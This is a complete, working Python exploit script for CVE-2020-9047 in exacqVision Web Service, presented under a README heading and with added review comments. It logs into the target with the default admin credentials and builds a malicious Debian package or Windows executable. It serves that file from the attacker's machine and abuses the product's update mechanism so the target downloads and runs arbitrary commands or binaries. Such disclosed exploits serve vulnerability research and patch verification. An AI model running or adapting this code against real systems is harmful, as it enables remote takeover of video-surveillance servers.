# README.md
# Rendering markdown...
# Exploit Title: exacqVision Web Service 3.8.2.67295 - 20.06.3.0 - Remote Code Execution
# Date: 2020-07-13
# Exploit Author: Michael W. Norris
# Technical Details: https://mnorris.io/research/CVE-2020-9047/
# Vendor Homepage: https://www.exacq.com/
# Software Link: https://www.exacq.com/support/downloads.php
# Tested On: exacqVision Web Service 3.8.2.67295 - 20.06.3.0
# CVE: CVE-2020-9047
# Source PoC: https://github.com/norrismw/CVE-2020-9047
#!/usr/bin/python3
import argparse, hashlib, http.server, json, os ,requests, shutil, socketserver, subprocess, sys, tempfile, threading, time
# ---------------------------------------------------------------------------
# Command-line interface.
#
# Everything below runs at import time: the arguments are parsed from
# sys.argv and the results are published as module-level globals (system,
# rhost, rport, lhost, lport, payload, command_flag, temp_dir, username,
# password) that the classes further down read directly.
# ---------------------------------------------------------------------------
description = (
    'Exploit for exacqVision Web Service as outlined in CVE-2020-9047. This program targets Windows and Linux x86 installations '
    'of exacqVision Web Service versions 3.8.2.67295 - 20.06.3.0. Written by Michael W. Norris.'
)
parser = argparse.ArgumentParser(description=description)

help_arg = (
    'The target operating system. Provide "WINDOWS" for Windows, "LINUX" for Linux, or "CHECK" to have this program perform a check. '
    'When using "CHECK", \'\' can be provided for the LHOST and PAYLOAD arguments.'
)
# A tuple (not a set) keeps the order shown in the usage/help text stable
# from one run to the next.
parser.add_argument('TARGET', choices=('WINDOWS', 'LINUX', 'CHECK'), help=help_arg)

parser.add_argument('RHOST', help='The IP address of the remote host; the IP address of the target.')

help_arg = 'The port on the remote host where exacqVision Web Service is running. Default: 80'
parser.add_argument('-p', metavar='RPORT', type=int, default=80, help=help_arg)

help_arg = (
    'The local IP address that will serve the payload for the remote host. This should not be "localhost" or "127.0.0.1". '
    'The remote host will need to be able to connect to the provided IP address. This program should be run on the system with '
    'the specified IP address.'
)
parser.add_argument('LHOST', help=help_arg)

help_arg = 'The local port that will be used to serve the payload file for the remote host. Default: 8000'
parser.add_argument('-s', metavar='LPORT', type=int, default=8000, help=help_arg)

help_arg = (
    'The absolute file path of an existing Windows executable (.exe) or Linux binary file on the local system. The binary will be '
    'executed on the remote host. If the --command flag is set and "LINUX" was provided as the TARGET argument, enter a command '
    'that will be executed on the remote host.'
)
parser.add_argument('PAYLOAD', help=help_arg)

help_arg = (
    'Sets the command flag. The flag allows for a command to be provided as the PAYLOAD argument instead of a file path to a binary. '
    ' The provided command will be executed on the remote host. The flag should be set only if "LINUX" was provided as the TARGET '
    'argument.'
)
parser.add_argument('--command', default=False, action='store_true', help=help_arg)

help_arg = 'The local existing directory where a randomly named temporary directory will be created. Default: /tmp'
parser.add_argument('-d', metavar='WEBDIR', default='/tmp', help=help_arg)

help_arg = 'The username for authenticating to the remote exacqVision Web Service application. Default: admin'
parser.add_argument('-U', metavar='USERNAME', default='admin', help=help_arg)

help_arg = 'The password for authenticating to the remote exacqVision Web Service application. Default: admin256'
parser.add_argument('-P', metavar='PASSWORD', default='admin256', help=help_arg)

args = parser.parse_args()

# Publish the parsed values under the short names used by the rest of the file.
system = args.TARGET
rhost = args.RHOST
rport = args.p
lhost = args.LHOST
lport = args.s
payload = args.PAYLOAD
command_flag = args.command
# The working directory is created immediately, whatever TARGET was given.
# NOTE(review): the "CHECK" path in the __main__ block exits without calling
# GenPayload.cleanup(), so this directory appears to be left behind in that
# mode - confirm whether that is intended.
temp_dir = tempfile.mkdtemp(dir=args.d)
username = args.U
password = args.P
class GenPayload:
    """Create the files that are served from the temporary web directory.

    The class reads the module-level globals produced by argument parsing
    (``system``, ``command_flag``, ``payload``, ``temp_dir``, ``lhost``,
    ``lport``, ``parser``).  For ``LINUX`` it assembles a Debian package tree
    under ``temp_dir`` and builds it with ``dpkg-deb``; otherwise it copies the
    payload next to the info file with an ``.exe`` suffix.  In both cases
    ``generate_fileinfo`` writes the INI-style update description that points
    at the staged file.
    """

    # Random names shared by every instance (class attributes, evaluated once
    # when the class body runs).
    # NOTE(review): tempfile._get_candidate_names() is a private helper of the
    # tempfile module and is not part of its documented API.
    random_infofile = next(tempfile._get_candidate_names())
    # Underscores are stripped from the payload/package name.
    # NOTE(review): presumably because the name is reused as the Debian
    # package name - confirm.
    random_payload = next(tempfile._get_candidate_names()).replace('_', '')
    # URL of the info file as seen by the remote host.
    server_url = 'http://%s:%s/%s' % (lhost, lport, random_infofile)

    def __init__(self):
        """Create the package directory tree (LINUX) and validate the flags.

        Exits after printing the help text when ``--command`` is combined
        with the ``WINDOWS`` target, which the program does not support.
        """
        if system == 'LINUX':
            self.package_dir = '/' + self.random_payload
            self.debian_dir = '/DEBIAN'
            os.makedirs(temp_dir + self.package_dir + self.debian_dir)
            if not command_flag:
                # A binary payload is shipped inside the package under /tmp.
                self.ptmp_dir = '/tmp'
                os.makedirs(temp_dir + self.package_dir + self.ptmp_dir)
        if system == 'WINDOWS' and command_flag:
            parser.print_help()
            sys.exit()

    def copy_payload(self):
        """Copy the PAYLOAD file into the staging area.

        For a LINUX binary payload the file goes into the package's ``/tmp``
        directory; in every other case it is copied to
        ``<temp_dir>/<random_payload>.exe``.
        """
        if system == 'LINUX' and not command_flag:
            destination = temp_dir + self.package_dir + self.ptmp_dir + '/' + self.random_payload
        else:
            destination = temp_dir + '/' + self.random_payload + '.exe'
        shutil.copyfile(payload, destination)

    def generate_control(self):
        """Write the ``DEBIAN/control`` file for the package."""
        file_path = temp_dir + self.package_dir + self.debian_dir
        content = 'Package: {random}\nVersion: 99.99.99.9999\nArchitecture: all\n'
        content += 'Maintainer: {random}\nDescription: {random}\n'
        content = content.format(random=self.random_payload)
        with open(file_path + '/control', 'w') as control:
            control.write(content)

    def generate_postinst(self):
        """Write the executable ``DEBIAN/postinst`` script for the package.

        The script starts/restarts the web service units and then runs either
        the operator-supplied command (``--command``) or the binary that was
        packaged under ``/tmp``.
        """
        file_path = temp_dir + self.package_dir + self.debian_dir
        header = '#!/bin/bash\nservice webservice start\nservice evapache restart\n'
        header += 'service wfe start\nsystemctl restart webservice\nsystemctl restart wfe\n'
        if command_flag:
            # The command is inserted verbatim; it is deliberately not passed
            # through str.format(), so braces in it are left untouched.
            content = header + '%s &' % (payload)
        else:
            content = header + 'chmod 2755 /tmp/{random} && /tmp/{random} &'.format(random=self.random_payload)
        with open(file_path + '/postinst', 'w') as postinst:
            postinst.write(content)
        os.chmod(file_path + '/postinst', 0o0755)

    def build_package(self):
        """Build the ``.deb`` with ``dpkg-deb`` and remove the source tree.

        If ``/usr/bin/dpkg-deb`` does not exist the temporary directory is
        removed and the program exits.
        """
        file_path = temp_dir + self.package_dir
        try:
            # subprocess.DEVNULL discards the tool's stdout without opening a
            # file handle that would then have to be closed.
            subprocess.run(['/usr/bin/dpkg-deb', '-Zgzip', '--build', '%s' % file_path], stdout=subprocess.DEVNULL)
        except FileNotFoundError:
            print('Just kidding. It appears that /usr/bin/dpkg-deb is not available on this system')
            GenPayload.cleanup(temp_dir)
            sys.exit()
        shutil.rmtree(temp_dir + self.package_dir)

    def package_md5sum(self):
        """Return the hexadecimal MD5 digest of a file.

        This function is invoked through the class as
        ``GenPayload.package_md5sum(path)``, so the single parameter - named
        ``self`` for historical reasons - is actually the file path.
        """
        with open(self, 'rb') as target_file:
            content = target_file.read()
        return hashlib.md5(content).hexdigest()

    def generate_fileinfo(self):
        """Write the update info file and return its (random) file name.

        The file holds two sections (``<os>-x64`` and ``<os>``) that both link
        to the staged file on ``lhost:lport`` and carry its size and MD5
        checksum.
        """
        # A local called ``sys`` would shadow the imported module, hence
        # ``os_name``.
        if system == 'LINUX':
            os_name = 'Linux'
            ext = 'deb'
        else:
            os_name = 'Windows'
            ext = 'exe'
        file_name = self.random_payload + '.' + ext
        target_file = temp_dir + '/' + file_name
        md5sum = GenPayload.package_md5sum(target_file)
        info_file = temp_dir + '/' + self.random_infofile
        content = "[ev-WebService-{os}-x64-99.99.99.9999]\nVersion=99.99.99.9999\nDate=12-31-9999\nDownloadable=True\n"
        content += "Link=http://{lh}:{lp}/{file}\nPackage={os}-x64\nProduct=webservice\n"
        content += "Filesize={fs}\nChecksumType=md5\nChecksumHash={md5}\nStatus=Recommended\nExtension={ext}\n\n"
        content += "[ev-WebService-{os}-99.99.99.9999]\nVersion=99.99.99.9999\nDate=12-31-9999\nDownloadable=True\n"
        content += "Link=http://{lh}:{lp}/{file}\nPackage={os}\nProduct=webservice\n"
        content += "Filesize={fs}\nChecksumType=md5\nChecksumHash={md5}\nStatus=Recommended\nExtension={ext}\n"
        content = content.format(
            os=os_name,
            lh=lhost,
            lp=lport,
            file=file_name,
            fs=os.path.getsize(target_file),
            md5=md5sum,
            ext=ext,
        )
        with open(info_file, 'w') as file_info:
            file_info.write(content)
        return self.random_infofile

    def cleanup(self):
        """Remove the temporary directory and announce the server shutdown.

        Called both on an instance and as ``GenPayload.cleanup(temp_dir)``;
        the argument itself is not used - the global ``temp_dir`` is removed.
        The HTTP server is not stopped here; only the message is printed.
        """
        print('\nRemoving temporary directory structure %s' % temp_dir)
        shutil.rmtree(temp_dir)
        print('Stopping HTTP server on 0.0.0.0:%s' % lport)
        time.sleep(1)
class InteractRemote:
    """Talk to the remote exacqVision Web Service over HTTP.

    The class reads the module-level globals produced by argument parsing
    (``system``, ``command_flag``, ``rhost``, ``rport``, ``lport``,
    ``username``, ``password``, ``temp_dir``) and the ``GenPayload`` class.
    """

    # Version strings the program recognises.  The first seven entries are
    # handled without an OS lookup; for the remaining ones vuln_check() also
    # queries /health.web to learn the remote operating system.
    vuln_versions = ['3.10.4.72058', '3.12.4.76544', '3.8.2.67295', '7.0.2.81005', '7.2.7.86974', '7.4.3.89785', '7.6.4.94391']
    vuln_versions += ['7.8.2.97826', '8.0.6.105408', '8.2.2.107285', '8.4.3.111614', '8.6.3.116175', '8.8.1.118913', '9.0.3.124620']
    vuln_versions += ['9.2.0.127940', '9.4.3.137684', '9.6.7.145949', '9.8.4.149166', '19.03.3.152166', '19.06.4.157118']
    vuln_versions += ['19.09.4.0', '19.12.2.0', '20.03.2.0', '20.06.3.0']

    def __init__(self):
        """Derive the target URLs from the parsed command-line globals."""
        self.target = '%s:%s' % (rhost, rport)
        self.http_target = 'http://' + self.target
        self.server_url = GenPayload.server_url
        self.default_url = 'http://www.exacq.com/downloads/evFileInfo.txt'

    def vuln_check(self):
        """Report whether the remote version is in ``vuln_versions``.

        Returns ``True`` when the run may continue (or when a ``CHECK`` run
        found a listed version).  Every other outcome - connection failure,
        unlisted version, TARGET/OS mismatch, the operator declining the
        prompt or pressing CTRL+C - terminates the program via ``sys.exit()``.
        """
        try:
            version = requests.get(self.http_target + '/version.web').text
            time.sleep(1)
        except (ConnectionRefusedError, OSError, TimeoutError):
            print('Failed to connect to the target: %s' % self.target)
            print('Is the target correct?')
            sys.exit()

        if version in self.vuln_versions[7:]:
            target_info = requests.get(self.http_target + '/health.web')
            json_info = json.loads(target_info.text)
            tar_system = json_info['os']['system']
            processor = json_info['os']['processor']
            print('Target OS: %s %s' % (tar_system, processor))
            print('EVWS Version: %s\n' % version)
            # Any other reported OS falls through to the checks below and ends
            # in the "Exploitable: NO" branch.
            if tar_system.lower() in ('linux', 'windows'):
                if system == 'CHECK':
                    print('Exploitable: YES')
                    print('Specify "%s" as the TARGET argument and provide a relevant PAYLOAD argument' % tar_system.upper())
                    return True
                try:
                    if system == tar_system.upper():
                        print('Exploitable: YES')
                        if system == 'LINUX' and not command_flag:
                            print('Confirm the specified PAYLOAD is compatible with the remote architecture')
                        else:
                            print('The provided command will be executed on the remote system')
                        cont_var = input('Press ENTER to continue or CTRL+C to exit\n')
                        if cont_var == '':
                            return True
                        sys.exit()
                    else:
                        print('Exploitable: YES')
                        print('... but the provided TARGET argument does not match the remote operating system')
                        print('Specify "%s" as the TARGET argument and provide a relevant PAYLOAD argument' % tar_system.upper())
                        sys.exit()
                except KeyboardInterrupt:
                    print('')
                    sys.exit()

        if version in self.vuln_versions[:7]:
            print('Target OS: Unable to automatically determine target OS/architecture')
            print('EVWS Version: %s\n' % version)
            if system == 'CHECK':
                print('Exploitable: UNKNOWN')
                print('Manually determine the operating system/architecture of the remote system')
                return True
            try:
                print('Exploitable: YES')
                # Print exactly one caveat: in command mode only TARGET has to
                # be right, otherwise both TARGET and PAYLOAD matter.
                if system == 'LINUX' and command_flag:
                    print('... but only if the provided TARGET argument is accurate\n')
                else:
                    print('... but only if the provided TARGET and PAYLOAD arguments are accurate/relevant')
                cont_var = input('Press ENTER to try or CTRL+C to exit\n')
                if cont_var == '':
                    return True
                sys.exit()
            except KeyboardInterrupt:
                print('')
                sys.exit()
        else:
            print('Exploitable: NO')
            print('Target %s is not vulnerable and/or this program will not work on the target.' % self.target)
            sys.exit()

    def authenticate(self):
        """Log in with the configured credentials and return the auth token.

        Exits the program when the service reports ``success`` as false.
        """
        auth_check = requests.post(
            self.http_target + '/service.web',
            data={'action': 'login', 'u': username, 'p': password},
        )
        reply = json.loads(auth_check.text)  # parse the body once
        result = reply['success']
        time.sleep(1)
        if result:
            return reply['auth']
        print('Failed to authenticate due to invalid credentials')
        sys.exit()

    def change_url(self, auth_token, default=False):
        """Set the service's update URL and return the reported success flag.

        With ``default=False`` the URL is ``self.server_url``; with
        ``default=True`` it is ``self.default_url``.
        """
        url = self.default_url if default else self.server_url
        req_data = {'auth': auth_token, 'url': url, 'timeout': '10'}
        change_update = requests.post(self.http_target + '/service.web/updates', data=req_data)
        result = json.loads(change_update.text)['success']
        time.sleep(2)
        return result

    def check_updates(self, auth_token):
        """Send the ``updatecheck`` request that names ``self.server_url``."""
        requests.get(self.http_target + '/service.web?auth=%s&action=updatecheck&updates_file=%s' % (auth_token, self.server_url))
        time.sleep(2)

    def download_update(self, auth_token):
        """Request download of version 99.99.99.9999, wait, then apply it.

        Returns ``True`` when the final ``update`` request reports success;
        otherwise removes the temporary directory and exits.
        """
        status_url = self.http_target + '/service.web?auth=%s&action=downloadupdatestatus&version=99.99.99.9999' % (auth_token)

        req_data = {'auth': auth_token, 'action': 'downloadupdate', 'version': '99.99.99.9999'}
        requests.post(self.http_target + '/service.web', data=req_data)
        # The status endpoint is queried once before the pause and again after
        # it; the first reply is not inspected.
        requests.get(status_url)
        time.sleep(2)
        progress = json.loads(requests.get(status_url).text)
        while progress['current_file_size'] != progress['total_file_size']:
            print('\nWaiting for download to complete.')
            time.sleep(1)
            progress = json.loads(requests.get(status_url).text)

        req_data = {'auth': auth_token, 'action': 'update', 'version': '99.99.99.9999'}
        update = requests.post(self.http_target + '/service.web', data=req_data)
        result = json.loads(update.text)['success']
        if result:
            return True
        print('\nThe target was unable to download the payload from %s' % self.server_url)
        GenPayload.cleanup(temp_dir)
        sys.exit()

    def temporary_server(self):
        """Serve ``temp_dir`` over HTTP on ``lport`` until the process ends.

        Changes the process working directory to ``temp_dir`` and then blocks
        in ``serve_forever()``.
        """
        print('Starting HTTP server on 0.0.0.0:%s' % lport)
        print('Serving payload from %s directory\n' % temp_dir)
        handler = http.server.SimpleHTTPRequestHandler
        os.chdir(temp_dir)
        httpd = socketserver.TCPServer(('', lport), handler)
        httpd.serve_forever()

    def server_thread(self):
        """Start ``temporary_server`` in a daemon thread and pause briefly."""
        worker = threading.Thread(target=self.temporary_server)
        # Daemon thread: it does not keep the process alive at exit.
        worker.daemon = True
        worker.start()
        time.sleep(1)
if __name__ == '__main__':
    # Script entry point: check the target, stage the files, serve them and
    # drive the remote update endpoints.
    remote = InteractRemote()
    builder = GenPayload()

    # CHECK mode only reports on the target and stops.
    if system == 'CHECK':
        remote.vuln_check()
        sys.exit()

    check_result = remote.vuln_check()
    token = remote.authenticate()

    # Stage the files under temp_dir.
    if system != 'LINUX':
        builder.copy_payload()
    else:
        builder.generate_control()
        if not command_flag:
            builder.copy_payload()
        builder.generate_postinst()
        builder.build_package()
    builder.generate_fileinfo()

    # Serve temp_dir in the background before contacting the update endpoints.
    remote.server_thread()

    # NOTE(review): vuln_check() returns True (or exits), never a version
    # string, so this membership test is always False and only the second
    # branch runs.  Left as-is; confirm the intended behaviour.
    if check_result in InteractRemote.vuln_versions[7:]:
        remote.change_url(token)
        remote.check_updates(token)
        remote.change_url(token, default=True)
        remote.download_update(token)
    else:
        remote.check_updates(token)
        remote.download_update(token)

    builder.cleanup()
    sys.exit()